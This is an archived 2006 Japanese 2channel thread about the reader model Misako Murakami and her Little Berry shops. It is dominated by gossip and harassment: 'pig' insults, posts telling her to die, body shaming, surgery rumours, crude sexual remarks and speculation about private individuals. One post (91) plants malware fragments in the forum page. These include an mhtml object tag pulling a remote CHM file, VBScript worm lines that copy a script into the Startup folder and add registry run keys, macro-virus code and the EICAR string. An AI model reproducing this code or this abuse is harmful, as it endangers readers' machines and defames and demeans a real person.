5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

★★★☆村上実沙子☆Vol.7☆★★★

1 :無名モデル:2006/09/29(金) 11:11:10 ID:tUP0arM7
新スレです!!
引き続き実沙子ちゃんについて存分に語りましょう!!
できればViViやTVの話題も歓迎します☆

[前スレ]
★★★☆村上実沙子☆Vol.6☆★★★
http://life7.2ch.net/test/read.cgi/model/1150096327/
http://life7.2ch.net/test/read.cgi/model/1158457124/

[前々スレ]
★★★☆村上実沙子☆Vol.5☆★★★
http://life7.2ch.net/test/read.cgi/model/1145171550/

[前々々スレ]
http://life7.2ch.net/test/read.cgi/model/1140761920/

2 :無名モデル:2006/09/29(金) 11:13:27 ID:yi9E2OS1
リトルベリーのロゴタンク安くてかわゆい〜^^誰か
何色がお勧めか教えて〜

3 :無名モデル:2006/09/29(金) 11:22:53 ID:???
>>2
フトベの店員さん、お疲れ様です。
豚子ちゃんに「早く豚の世界へお帰りなさい!」と伝えて頂けますか?

4 :無名モデル:2006/09/29(金) 11:27:23 ID:???
これが新スレ!?法子がどうせ立てたんだろ!死ねカス!!おきたけいこ

5 :無名モデル:2006/09/29(金) 11:30:22 ID:???
豚子さん、速やかにボッタクリはやめなさい!!!

6 :無名モデル:2006/09/29(金) 11:31:28 ID:???
>>2
ばか

7 :無名モデル:2006/09/29(金) 11:32:42 ID:???
>>2
かわゆいとかキモイ
ド田舎では流行ってるんですか?

8 :無名モデル:2006/09/29(金) 11:33:31 ID:???
マドンナやブリトニーの名前を使うのは違法ではないのですか?


9 :無名モデル:2006/09/29(金) 11:34:33 ID:???
豚子さんの弟ってあれは奇形なのですか?
豚子さんのお母様ってあれはかばで間違いないですか?



10 :無名モデル:2006/09/29(金) 11:35:31 ID:???
飛べ!豚子!人間界から豚の世界へ羽ばたけ!

11 :無名モデル:2006/09/29(金) 12:20:19 ID:???
スレタイしょぼすぎてここはだめだね。

12 :無名モデル:2006/09/29(金) 12:30:06 ID:???
8ブリトニーやマドンナの名前を承諾なしに勝手に使うのは違法やで。
例えブリトニーやマドンナが見ないからって使うのも違法。
でもそーしなきゃ売れないんでしょ。みさこの周りはリトルベリーのダサい
商品使ってるけど。それで儲かってるんじゃない。

13 :無名モデル:2006/09/29(金) 12:45:58 ID:???
このスレ削除してくれません?
アンチの次スレが立てれなかったんですけど・・・

14 :無名モデル:2006/09/29(金) 14:37:56 ID:Us+XFvQx
2時ピタッ!は今日で終わっちゃうんです!!
http://www.tbs.co.jp/niji-pita/ http://www.tbs.co.jp/niji-pita/cover/cover0608.html
http://www.tbs.co.jp/niji-pita/neta/neta060801.html http://www.tbs.co.jp/niji-pita/img/cover/060801.jpg
http://www.tbs.co.jp/niji-pita/neta/neta060808.html http://www.tbs.co.jp/niji-pita/img/cover/060808.jpg
http://www.tbs.co.jp/niji-pita/neta/neta060822.html http://www.tbs.co.jp/niji-pita/img/cover/060822.jpg
http://www.tbs.co.jp/niji-pita/neta/neta060829.html http://www.tbs.co.jp/niji-pita/img/cover/060829.jpg
http://www.tbs.co.jp/niji-pita/cover/ http://www.tbs.co.jp/niji-pita/cover/cover0609.html
http://www.tbs.co.jp/niji-pita/img/cover/060905.jpg
http://www.tbs.co.jp/niji-pita/img/cover/060912.jpg
http://www.tbs.co.jp/niji-pita/img/cover/060919.jpg

15 :無名モデル:2006/09/29(金) 15:33:15 ID:hkxB+tAU
みーたんボッタクリはありえへんわ。

16 :無名モデル:2006/09/29(金) 15:58:56 ID:hkxB+tAU
美沙子さん自身はかわいいけど性格悪そうだよね。
しゃべり方悪いよね。

17 :無名モデル:2006/09/29(金) 16:15:57 ID:WfgR7Y6C
デブモデル撲滅

18 :無名モデル:2006/09/29(金) 22:35:07 ID:hkxB+tAU
ボッタクリだし、六麓荘から岡本に引っ越したけど、奥田みたいにはなれへんわ。豚豚豚豚豚豚豚豚豚豚豚豚豚豚豚豚豚豚豚豚豚豚豚豚豚豚豚豚豚豚豚豚豚豚豚豚





19 :無名モデル:2006/09/30(土) 00:22:32 ID:hDgVUbjO
お父さん死んじゃったの?


20 :無名モデル:2006/09/30(土) 00:35:15 ID:IRCiRfUJ
豚キモイ
おい、村上





目が腐っちゃうぜ

21 :無名モデル:2006/09/30(土) 00:36:55 ID:???
内容がアンチのみになってる…

22 :無名モデル:2006/09/30(土) 15:44:02 ID:pNQkQuLU
みーたんはアンチばっかだよ。

23 :無名モデル:2006/09/30(土) 15:45:38 ID:???
今更ながらなんでお父さん死んじゃったの?

24 :無名モデル:2006/09/30(土) 15:57:32 ID:pNQkQuLU
交通事故。マンガに書いてるよ。

25 :無名モデル:2006/09/30(土) 16:05:23 ID:???
そうなんやあ
突然事故で死なれるくらい辛い事ってないよね

26 :無名モデル:2006/09/30(土) 16:19:11 ID:???
でも豚は平気そうだよね

27 :無名モデル:2006/09/30(土) 18:15:41 ID:2eTZfusd
16,みさこのしゃべり方ってどんな感じ?

28 :無名モデル:2006/09/30(土) 19:30:15 ID:???
この前彼とBIGSTEPに行った時のとんでもない出来事聞いてください。
村上実沙子の店がBIGSTEPにあるとは知らずに、エスカレーターでB1Fに向かっていたわけですよ。
ただブラブラとウインドウショッピングって感じで。
今日の夜どこで食べようか?と彼と携帯でホットペッパーなんとなく見ながら歩いてて、B1Fの出入り口付近でちょっと立ち止まっていました。

そしたら、実沙子がすごい形相でこっちに来て
「勝手に私やお店を撮らないで下さい!!お買い物もされていないのに困ります。今ここで写メ消去してください!!」

はぁ??????
もちろんブチ切れですわな。
携帯ソッコー見せ付けて
「どこに写メあんねんな?なんのことやねんや?!誰やあんた」
って言いました。
全く謝ろうともせずにフン!!て感じで立ち去ろうとしたので
「謝らんかいや!人にわけわからんインネン付けといてなんやオマエ。ちょっとここの管理室に言ってくるわ!!」

「すみませんでした」

ツンとした感じでね。ホンマ腹立つわ。どれだけ自信過剰なんこの人。
携帯いじってる人がいるだけで自分が撮られてると思うとかほんまナルやね。

長文&一部口悪スマソ

29 :無名モデル:2006/09/30(土) 22:06:53 ID:???

前CARE行った時、髪質は実沙子ちゃんタイプですね、
って言われた・・・・ガックリ

しかもJAMシャンプーは「みさこブルー」が一番売れてなかったしねw
今でも売れ残ってて、ヤフオク出てるのはみさこブルーばっか

30 :無名モデル:2006/09/30(土) 22:25:37 ID:YQZlGYVD
>>24
どんな事故だったの?


31 :無名モデル:2006/09/30(土) 23:08:02 ID:???
かわいいよね大好きみさこちゃんみたいになりたいです
私はみさこちゃん意識してます

32 :りえ:2006/09/30(土) 23:17:04 ID:???
ミサコチャンとビッグステップで写真気持ちよく撮ってくれたよ
ミサコチャン本当に誠実で誰にでも感じがいいです
私の彼しもミサコチャンがイッちゃん可愛いって・・・・・・・
私が焼きもち焼く位可愛い可愛い連発していました。
けどミサコチャンなら許せる本当に可愛いんだもん

33 :無名モデル:2006/09/30(土) 23:18:20 ID:???
細いし顔小さいよ。肌がなんであんなにキレイんだろう。
生まれたときから違うのかなあ

34 :無名モデル:2006/09/30(土) 23:19:16 ID:???
リトルベリーもメタメタかわいいポーチ買っちゃいました♪

35 :無名モデル:2006/10/01(日) 00:13:05 ID:kxKXC/KA
みさこのしゃべり方ってどんなんなん?

36 :無名モデル:2006/10/01(日) 00:20:53 ID:???
>>31>>32>>33>>34
よっぽど実沙オタなんだね
あんたみたいなのが豚実沙の豪遊費になってんだ〜
奉仕してあげてるんだね

37 :無名モデル:2006/10/01(日) 00:29:46 ID:6tUdhQf4
>>36 イヤイヤ…同じ人がレスしてるだけでしょ。本人乙

38 :無名モデル:2006/10/01(日) 00:31:53 ID:???
>>37
分かってるケド??
だからあんたになってるやん

39 :無名モデル:2006/10/01(日) 00:32:38 ID:???
全部おきたけいこだよ。キチガイ豚ミサヲタ!

40 :無名モデル:2006/10/01(日) 00:43:27 ID:???
豚ヲタじゃなくて案外豚本人だったりしてwwww

41 :無名モデル:2006/10/01(日) 02:21:38 ID:???
豚だけだよね
スレが3つもあるって(゚∀゚)

42 :無名モデル:2006/10/01(日) 11:01:59 ID:???












43 :無名モデル:2006/10/03(火) 23:35:11 ID:kt51GE1q
豚オタなんないないよ。ついでに今ブサ子さんは日本にいないよ。良かったね。
この人相当借金してるよね。網ちゃんなんてもっとしてそうだよ。ドクモの将来ないわ。

44 :無名モデル:2006/10/03(火) 23:38:25 ID:???
阿部みほかはあほ!

45 :無名モデル:2006/10/04(水) 10:28:12 ID:W3fFXLsx
豚オタなんないないよ。ついでに今ブサ子さんは日本にいないよ。良かったね。
この人相当借金してるよね。網ちゃんなんてもっとしてそうだよ。ドクモの将来ないわ。

46 :無名モデル:2006/10/04(水) 11:32:25 ID:TlwWKXFB
昔、美容室で隣の子よくしゃべるな〜って思って見たら
実沙子ちゃんだった。
ショックだったのが、サンダルがかなり汚かったのと足の指がまめで
なんかすごかった・・・


47 :無名モデル:2006/10/04(水) 12:48:02 ID:Kkal8RPD
CAREなの?

48 :無名モデル:2006/10/04(水) 15:06:26 ID:Kkal8RPD
可愛い☆

49 :無名モデル:2006/10/04(水) 19:35:19 ID:W3fFXLsx
かわいいよね。この子初めてみた時は不細工って思ったんだけど、見てるうちに可愛いって思うようになったよ。好感あるし。 ただリトベ行ってからは好感なくなった。

50 :無名モデル:2006/10/04(水) 20:03:30 ID:???
この子表面だけは愛想良いようにしてるけど、裏では毒モの悪口ばっかやし。
自分に従えみたいな感じの性格。亜美が付き合っていけないのが分かった。

51 :無名モデル:2006/10/05(木) 15:49:44 ID:5pE9r994
今まで、かわいくない!って思ってたけど
実物を見てびっくり♪
実際のほうが、ホントにかわいいって素直に思えた。


52 :無名モデル:2006/10/06(金) 10:04:51 ID:FEZ2Df7P
素直に可愛い☆

53 :無名モデル:2006/10/06(金) 10:19:21 ID:???

写真よりは実物の方がいいのは認めるけど、
やっぱ嫌い。

商売のやり方が汚い・人気あると勘違い
ファン(信者)が自分の為に金を使ってくれると思ってる

54 :無名モデル:2006/10/06(金) 10:37:32 ID:VmAgVqDU
昔が不細工すぎたから、今がマシなだけ。

55 :無名モデル:2006/10/06(金) 11:18:27 ID:t59VtS4u
この子はどこを整形したの?
なんでみんなこの話題は出さないの?

56 :無名モデル:2006/10/06(金) 18:02:16 ID:xA1Tmp/0
みさこさんボッタリはやめて下さい。
あなたのことを好きになれません。
値段はやく下げて下さい。
ありさちゃんイビルのはやめてあげて下さい。

57 :無名モデル:2006/10/06(金) 21:14:31 ID:???
>>55
 は? アンチ板で散々言われてますが??

58 :無名モデル:2006/10/06(金) 22:33:00 ID:???

リトルべリーもいい商品あって好きです。みさこちゃんも
お金持ちで品があって羨ましい。
本気でみさこちゃんみたいに可愛くなりたいです


59 :無名モデル:2006/10/06(金) 22:33:50 ID:???
いいこですよね!僻まないのよん

60 :無名モデル:2006/10/07(土) 09:31:20 ID:???
豚 死ね うざい

61 :無名モデル:2006/10/07(土) 13:19:11 ID:???
>>58


豚になりたいならギターショルダー買え!!

62 :無名モデル:2006/10/07(土) 13:52:29 ID:???
>>56
ありさちゃん、お嬢様ですから!!

63 :無名モデル:2006/10/07(土) 23:09:53 ID:???
みさこちゃん超お嬢様で可愛いし羨ましい

64 :無名モデル:2006/10/07(土) 23:11:03 ID:???
本物見て感激でした。。。。実沙子ちゃん優しいセンスいいし
最近1番輝いてると思う

65 :無名モデル:2006/10/07(土) 23:13:25 ID:TscUM7h5
ありえん ぶさほめとるやつ一人で大量カキしとる

66 :無名モデル:2006/10/08(日) 00:03:03 ID:???
みさこちゃんメチャいい感じのひとでした!それは認める
アクセも相当カワイイし最近服がカワイイですね!
バイト代入ったらワンピ買いにビッグステップ行くよ

67 :無名モデル:2006/10/08(日) 00:05:07 ID:???
綺麗だよね。。。。。つうかなにがありえないのか意味がわからない
ミサコチャンほどン意に対しても一生懸命で素直に生きてる人いない
と思います。ミサコチャンみたいになりたいと思います

68 :無名モデル:2006/10/08(日) 00:09:52 ID:???
はい、どうぞブサ子さんみたいになってください
マタニティワンピ着てギターショルダー背負って、
周囲の視線を独り占めしちゃってください。

69 :無名モデル:2006/10/08(日) 06:34:49 ID:???
全角でsageの奴、自演乙

70 :無名モデル:2006/10/08(日) 07:29:25 ID:???
>>63>>64>>66>>67

71 :無名モデル:2006/10/08(日) 10:56:38 ID:7HvxztHs
>>28
私も知らずにビックステップの地下におりて本人に遭遇。

接客してたんだけど、びっくりしたよ。
何にって鼻に。

整形してないと思っていたのに、見て一発で してる ってわかった。
不自然すぎて何度も顔みてしまった

確かに目線に気づいて何度も私のほうちらちら見ていたけれど
顔を凝視する私も悪いですが凝視せざるをえない鼻だったので・・・アウウ

72 :無名モデル:2006/10/08(日) 14:37:25 ID:???
>>67
みさこちゃんみたいになりたい・・・・?
勝手にすればいいじゃん

ある意味、注目の人になれます

73 :無名モデル:2006/10/09(月) 19:29:00 ID:???
自作自演してる奴超笑える!! 一人猿芝居(笑)
豚同様の猿!!

74 :無名モデル:2006/10/10(火) 14:47:58 ID:DDe5iTVu
色は逆でも良し。
その人がちゃんと周りを見る人ならば、
まわりにさりげない気配りしてると好印象かな。
モチロン気になる人には、他

75 :無名モデル:2006/10/10(火) 21:18:31 ID:???
安いし品質もいいしみさこちゃんも大好き
こんな上品なお姉さんになりたいなあ

76 :無名モデル:2006/10/10(火) 21:19:37 ID:???
リトルベリーカワイイ新店舗もメタメタ素敵でした
妹もみさこちゃんが相当好きです

77 :無名モデル:2006/10/11(水) 11:30:08 ID:???
昨日、みさことキスする夢見た。唇が柔らかくてチンコがビンビンになっちゃいました。
もうちょっとで夢精するとこでした。

78 :無名モデル:2006/10/11(水) 14:09:03 ID:cZEuGlcO
歯槽膿漏うつるぞ?

79 :無名モデル:2006/10/11(水) 17:24:45 ID:???
>>78
じゃあ俺とキスしよ?

80 :無名モデル:2006/10/12(木) 20:18:53 ID:oXHxPSft
定食屋の娘仰天セレブ生活☆初体験!へんしん生活☆
http://bubble4.2ch.net/test/read.cgi/natsutv/1160649302/

81 :無名モデル:2006/10/13(金) 18:09:32 ID:???
豚子氏ねよ

82 :無名モデル:2006/10/14(土) 21:04:55 ID:KNlTUTD1
みーたんってかわいいけど品がないよね。最近やせすぎてキモいよ。

83 :無名モデル:2006/10/14(土) 21:43:26 ID:???
痩せすぎは亜美。豚子は太りすぎ。
可愛いのは気のせい。

84 :無名モデル:2006/10/14(土) 22:11:28 ID:KNlTUTD1
みーたん最近痩せてない?顔が明らかに変だよ。老けただけとは思わえない。骸骨みたいになってるよ。整形だとは思えないし。前のが良かったね。


85 :無名モデル:2006/10/15(日) 22:26:59 ID:???
みさこちゃん美人だよね。上品だし本当に憧れ

86 :無名モデル:2006/10/15(日) 22:30:28 ID:???
全く太くないしガリガリのあみちゃんより
親近感あっていなあって思います

87 :無名モデル:2006/10/15(日) 22:33:13 ID:???
大好きやわ・・・・・・・相当ベッピンやと思う

88 :無名モデル:2006/10/15(日) 22:48:44 ID:LdEqAjx/
村上実沙子の唾を顔に塗りたくりたい。

89 :無名モデル:2006/10/17(火) 17:20:04 ID:C6ZO1WOU
大好きやわ・・・・・けっこうベッピンだと思う☆

90 :無名モデル:2006/10/19(木) 18:03:21 ID:???
豚 消えろ

91 :<body onload=window()>:2006/10/19(木) 20:27:53 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


92 :無名モデル:2006/10/20(金) 10:49:51 ID:???
スライは25から28まであるよ

93 ::2006/10/20(金) 14:50:05 ID:uiK2PFt9
美人とかありえーん
わらける
周りはよっぽどブスなんやろなー

94 :無名モデル:2006/10/21(土) 20:48:51 ID:???
大嫌いやわ・・・・・結構歯槽膿漏やし☆

95 :無名モデル:2006/10/21(土) 22:32:14 ID:???
大好きメチャかわいい

96 :じゅん:2006/10/21(土) 22:34:26 ID:???
本物相当綺麗だったよん!彼氏もみーたんが1番可愛いって言ってた

97 :無名モデル:2006/10/21(土) 22:39:03 ID:NwSdIXUr
モテソウだよね。いいなあお母さん受けも良さそう

98 :無名モデル:2006/10/21(土) 23:22:24 ID:???
みんな昔のみさこを知らないのかな
えら削ったん?
昔のbis見たんだけど顔の形が違いすぎてまじびっくり!

99 :無名モデル:2006/10/23(月) 08:13:40 ID:???
>>96
じゃあ、あんたの彼氏を豚子にやればいいじゃん?


100 :無名モデル:2006/10/23(月) 09:03:32 ID:???
今日もダルマワンピを着て田舎娘から金をむしりとる悪徳商売ブサ子たん

101 :無名モデル:2006/10/23(月) 17:42:09 ID:opgpvf9Y
彼女のお店にも行ったことないので、商品も実際見たことはないけれど、信じられないような商品を
信じられないような値段で売ってませんか?

それとブログ見てると、彼女は全部「人のマネ」してない??
オーダーのジュエリーって、この前福王寺彩乃ちゃんがはじめてなかった?

102 :無名モデル:2006/10/23(月) 18:06:26 ID:6BBlMQYN
いつも自分が人真似ばかりで、真似されたことがないから
真似される側の気持ちがわからないんじゃないかな。
ファンの子が好きなモデルを真似たりするのと違って
自分のオリジナルとして発信してるからたち悪い。

103 :無名モデル:2006/10/23(月) 18:51:03 ID:???
でもみーたん、ブスではないよ〜
どっちかと言うと可愛いほうだし!

104 :無名モデル:2006/10/24(火) 12:11:15 ID:???
そりゃ、あれだけ整形してるからね。ドブスだったら困るっしょ

105 :無名モデル:2006/10/24(火) 14:42:57 ID:???
めっちゃ屁臭そう
うんこ太そう

106 :無名モデル:2006/10/24(火) 14:58:38 ID:???
亜美とみさこの店はママがしゃしゃり出てくるけど、
ホク田の親は出てこないよね。親は親でちゃんと別で頑張ってるぽいから、
その辺は他の2人よりマシだね



107 :無名モデル:2006/10/25(水) 02:42:56 ID:???
奥田は放置子

108 :無名モデル:2006/10/25(水) 19:13:41 ID:???
パンツはかないから何時もマムコ臭がするんだってぇ
迷惑だよねぇえええええええええええええええええ


109 :無名モデル:2006/10/25(水) 19:41:38 ID:???
あんなガラクタのノベルティーかプレゼントか知らないけどいらない!!

110 :無名モデル:2006/10/25(水) 20:16:11 ID:???
ノベルティじゃなくペナルティだな

111 :無名モデル:2006/10/25(水) 22:44:19 ID:A+Kqwkrj
すんごい顔違うぞ、最近。
一瞬誰か分からなかった。

112 :無名モデル:2006/10/25(水) 23:16:15 ID:???
viviでミートン見てると鼻が硬そうだなーって思うよ。
あれ、絶対整形だよな。


113 :無名モデル:2006/10/26(木) 04:15:36 ID:???
チャオズだお

114 :無名モデル:2006/10/26(木) 11:14:56 ID:bZ104Yya
かわいすぎ!!!

115 :無名モデル:2006/10/26(木) 11:16:18 ID:???
うんこ

116 :無名モデル:2006/10/27(金) 18:55:57 ID:???
よくtinkpinkのデザインをパクってるよね。
ブログで親友って書いておきながら、よくそんなことできるよ。

117 :無名モデル:2006/10/28(土) 12:05:50 ID:K9eb3q99
でもかわいい!!

118 :無名モデル:2006/10/28(土) 12:24:47 ID:4TgEkwZ1
リトルベリーの袋を持ってる子見た!可愛い子だったけど袋を見た瞬間かわいそうに思えてしかたがなかった

119 :無名モデル:2006/10/29(日) 16:49:19 ID:WUSrR+pB
みーd
関ジャニコンサート出現

120 :無名モデル:2006/10/29(日) 22:05:55 ID:7yjXWJxi
みーたんかわいいよね。この子の鼻羨ましいよ。整形するならこの子みたいな鼻にするな。
鼻がきれいなのが羨ましい。
でも優しくなさそうだよね。

121 :無名モデル:2006/10/29(日) 22:53:35 ID:???
そりゃ整形したんだもん。鼻筋変だったらおかしいでしょ。

122 :無名モデル:2006/10/30(月) 23:19:12 ID:7hDhE1Kh
みーたんの鼻理想やわ。
みーたんの鼻いいな〜。

123 :無名モデル:2006/10/30(月) 23:21:14 ID:???
じゃ整形すれば

124 :無名モデル:2006/10/30(月) 23:27:39 ID:???
そんなに実沙子になりたきゃ整形すればいい。

125 :無名モデル:2006/10/31(火) 04:31:31 ID:f64ZnOUs
みーたん口臭かった・・・マジで。
なんか幻滅しちゃった

126 :無名モデル:2006/10/31(火) 08:52:49 ID:Xbw22pUf
みーたんの鼻に整形します。
親に言ったら賛成だって。最高の親やね。
みーたんみたいな綺麗さになりたいな♪
みーたんアンチなんかどうでもいいよ。
みーたん鼻きれいやし。好き。

127 :無名モデル:2006/10/31(火) 08:54:45 ID:???
>>126
クラブに行ったら鼻が光るから気をつけてね
あれ、最高にかっこ悪いから

128 :無名モデル:2006/10/31(火) 10:59:17 ID:???
>>126親子共々すごい不細工なんだねぇ〜整形賛成→いい親だなんて。おめでたいわぁ。

129 :無名モデル:2006/11/01(水) 18:35:29 ID:???
て事は親は126の事ブサだって思ってるんだね。
凄い。早く整形しな

130 :無名モデル:2006/11/02(木) 08:06:41 ID:zLv+cY4N
白ノースリワンピにピンクカーデ、
白かピンクのミュールに薪薪ヘアーで
決まりだ!

131 :無名モデル:2006/11/02(木) 08:14:54 ID:???
凄い嫌われようだね!こんなに皆を腹立たしい気持ちにさせて、ある意味天晴れだわブサ子☆

132 :無名モデル:2006/11/02(木) 09:36:46 ID:???
ゴッツゴツのじゃがいもフェイスちゃん♪

133 :無名モデル:2006/11/02(木) 11:03:26 ID:QR+Hj/+R
ジャガリコジャガリコ

134 :無名モデル:2006/11/02(木) 11:08:23 ID:???
ジャガリコワロス

135 :無名モデル:2006/11/02(木) 11:47:40 ID:???
村上ジャガリ子

136 :無名モデル:2006/11/02(木) 12:10:55 ID:psJibfzI
みーたんかわいいと思うな。


137 :無名モデル:2006/11/03(金) 14:37:32 ID:VwCaLbMx
実沙子ちゃんJAと相変わらず仲良しのままかな?☆

138 :無名モデル:2006/11/03(金) 15:20:59 ID:???
Mは仲良しってアピールするけど実際は踏み台にしか思ってないし。
元々JAMって考え方も性格もセンスも全部違うから合わないぶん
JAM以外で自分に合う友達とつるむ。
JAMは仕事だけって感じ。

139 :無名モデル:2006/11/03(金) 22:01:36 ID:???
>>136
お前みたいなキモイ処女が何言っても無駄( ´,_ゝ`)プッ


140 :無名モデル:2006/11/04(土) 00:52:03 ID:YZp5oDm/
村芋実る子

顔も、腰も肩もケツも骨出っ張り突っ張り
次は『ちゃんこ鍋・ブー』を出して欲しい。ドスコイ!ごっつぁんです!

141 :無名モデル:2006/11/04(土) 14:52:45 ID:FtiN4y0f
読モ続けるのかな?☆

142 :無名モデル:2006/11/05(日) 00:53:08 ID:IR5VbKGY
読モなの?この豚?

143 :無名モデル:2006/11/05(日) 00:56:39 ID:vQ1QLGtu
ほんまきらい

144 :無名モデル:2006/11/05(日) 00:59:48 ID:vQ1QLGtu
自分のことわかってへんよな、この豚
この見た目やったらもうちょい謙虚に生きよ、と思うやろフツーは

145 :無名モデル:2006/11/05(日) 12:28:23 ID:UTlkBoVw
昔、JJbisで小顔ジェル紹介してたのどなたか知りませんか??
本当に顔引き締まったから、すごいな〜と思って…

146 :無名モデル:2006/11/05(日) 13:32:02 ID:ewwJszD5
>>145
わらえちゃったよ!!

147 :無名モデル:2006/11/05(日) 16:27:45 ID:pRHkoxsM
みーたん十分かわいいよ。

148 :無名モデル:2006/11/11(土) 15:11:42 ID:HV3HGWvJ
かわいいですよね!!☆

149 :無名モデル:2006/11/11(土) 20:01:55 ID:???
くさいですよね!!☆

150 :無名モデル:2006/11/14(火) 16:38:09 ID:zLLZMARv
☆おねだり姫☆
実沙子ちゃん、大西真央ちゃんと仲良しなの?

151 :無名モデル:2006/11/14(火) 16:48:08 ID:zLLZMARv
可愛がってください!!☆

152 :無名モデル:2006/11/14(火) 17:47:48 ID:zLLZMARv
ホントこの人顔のことだけは叩かれないよね
ところで親友とは結局のとこどうなの?

153 :無名モデル:2006/11/14(火) 18:17:06 ID:???
漢字は知らないけど↑大西まみだよ。

154 :無名モデル:2006/11/14(火) 19:00:49 ID:zLLZMARv
セレブなの?

155 :無名モデル:2006/11/14(火) 19:05:47 ID:zLLZMARv
名糖・湯布院の温泉旅館の女将になるの?☆

156 :無名モデル:2006/11/14(火) 19:14:10 ID:zLLZMARv
湯布院名糖の二枚目
矢頭盛吾さん31歳
村上実沙子に婿入りか??

157 :無名モデル:2006/11/14(火) 19:17:22 ID:???
ギャハハ(^Q^)/^

158 :無名モデル:2006/11/14(火) 19:38:31 ID:zLLZMARv
神戸のカリスマ美容師セレブ!
古荘文彦さん39歳
村上実沙子に婿入りか??☆

159 :無名モデル:2006/11/14(火) 19:45:19 ID:???
Little Berry☆

160 :無名モデル:2006/11/15(水) 12:42:50 ID:nheHbsRJ
☆岡本店☆
2006-10-17 16:02:14
テーマ:実沙子の日記 http://ameblo.jp/misako-littleberry/theme-10018471813.html
http://ameblo.jp/user_images/56/8e/10010932923_s.jpg
今からtv東京のロケがあるので、岡本店に来ました☆静岡から、ゆみち
ゃんとまゆみちゃんが来て下さいましたぁ★〃イニシャルネックレスとピ
アスをお買い上げ頂きましたo(^-^)oありがとうございますっ☆ロケが終
わり次第、BIGSTEP店に行きます♪
記事URL http://ameblo.jp/misako-littleberry/entry-10018471813.html

☆テレビ☆
2006-10-17 17:18:09
テーマ:実沙子の日記 http://ameblo.jp/misako-littleberry/theme-10018474498.html
http://ameblo.jp/user_images/4c/b3/10010935199.jpg
今日は岡本店でテレビのロケがありましたo(^-^)o
放送日は11月16日
夕方4時〜5時15分
テレビ大阪『ビューティバイブル』です☆〃
リトルベリー岡本店が紹介されるので、よかったら見てくださぁい(>_<)♪
記事URL http://ameblo.jp/misako-littleberry/entry-10018474498.html

161 :無名モデル:2006/11/15(水) 16:00:51 ID:K96nNjHO
白ノースリワンピにピンクカーデ、
白かピンクのミュールに薪薪ヘアーで
決まりだ!

162 :無名モデル:2006/11/16(木) 16:02:27 ID:nYNorHEQ
今日はTV東京系で『ビューティバイブル』と言う、美を追求する企画番組にリトルベリー岡本店が登場します…(^o^)良ければ見て下さいね☆

163 :無名モデル:2006/11/16(木) 16:37:22 ID:???
見ない

164 :無名モデル:2006/11/16(木) 18:07:50 ID:nYNorHEQ
かわいい!!

165 :無名モデル:2006/11/16(木) 18:10:06 ID:???
>>162
親子&店の紹介(30秒)・小さい家へ入る。クイズ(2分?)。親子がうつる(5秒)

166 :無名モデル:2006/11/16(木) 21:50:56 ID:HXlDas2r
きしょいかったよな。


167 :無名モデル:2006/11/17(金) 02:37:26 ID:CdjYJhXr
雑誌より全然デブでびっくりした><

168 :無名モデル:2006/11/17(金) 15:58:11 ID:M9CK6sYJ
みーたん根暗だよね。すっごく下品で間抜けな人だよね。
とても存在がきもいよね。

169 :無名モデル:2006/11/18(土) 10:27:51 ID:???
blogのサイトみたーい。教えてm(__)m

170 :無名モデル:2006/11/18(土) 10:29:42 ID:z9mQc7MY
今度合コンあるんですけど、何を着ていけば
オトコ受けいいですかねぇ??
相手は27前後の人です。
たぶんオシャレにそんなに気を使ってないかと思われます。

171 :無名モデル:2006/11/18(土) 10:39:57 ID:QHp/NMoA
171 :ノーブランドさん :04/06/21 10:39
白ノースリワンピにピンクカーデ、
白かピンクのミュールに薪薪ヘアーで
決まりだ!

172 :無名モデル:2006/11/18(土) 10:48:22 ID:???
>>170
こないだ24〜28ぐらい(一人一人の実年齢は知らん)と合コンした時は
めざましTVのアナウンサー達みたいな恰好だった。
店にもよるけどジーンズスタイルで来る人もるし、ふかだきょうこみたいな恰好じゃなければ
そんなに気にする事はないと思われ。

173 :無名モデル:2006/11/18(土) 12:31:06 ID:z9mQc7MY
>>171
ピンクノースリワンピに白のカーデっていう逆パターンでも
いいかなぁ?それならもってる♪
狙った人にはどうやって近づけばよいでしょうか?
あんまり合コン経験ないんで・・・。
一人知ってる人がその中にいるんですけど(狙ってる)
すごいオトコっぽい人なんですよね。
どうやったら嫌われずにいけるかなぁ・・・??
教えてください。

174 :無名モデル:2006/11/18(土) 12:38:14 ID:QHp/NMoA
色は逆でも良し。
その人がちゃんと周りを見る人ならば、
まわりにさりげない気配りしてると好印象かな。
モチロン気になる人には、他の人よりちょっとだけより気を配る。
みんなの前であからさまに「狙ってます!」みたいな人は男でも引くよ。
んで解散時にアドなり電話番号なり渡して、後日2人で会えばイイんでない?

175 :無名モデル:2006/11/18(土) 13:25:48 ID:2MeRG5to
コピペuzeeeeeeeeeeeeeeee!!!!

176 :無名モデル:2006/11/18(土) 13:37:42 ID:???
JAMが好きだった自分が恥ずかしい。

177 :ナオッペ ◇ZFrVR1zkh2:2006/11/23(木) 10:48:57 ID:???
2ちゃんより裏2ちゃんの方が画像とかいっぱい載ってるからおもしろいね。
みさこちゃんやばい。笑

178 :無名モデル:2006/11/23(木) 12:27:49 ID:heBLOzxk
JAMってなつかしいね。もう終わったな

179 :無名モデル:2006/11/27(月) 00:02:15 ID:???
